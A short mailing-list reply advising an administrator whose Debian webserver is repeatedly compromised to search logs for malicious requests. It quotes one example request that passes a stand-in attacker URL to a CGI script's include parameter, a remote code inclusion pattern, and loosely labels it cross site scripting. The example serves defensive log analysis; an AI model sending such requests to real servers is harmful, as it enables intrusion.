Re: Advice needed, trying to find the vulnerable code on Debian webserver.

[Alf B Lervaag]

Ross Tsolakidis wrote:
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.

I suspect cross site scripting.  You should parse your logs and search
for requests like:
 GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/malicious-code.txt

-- 
Alf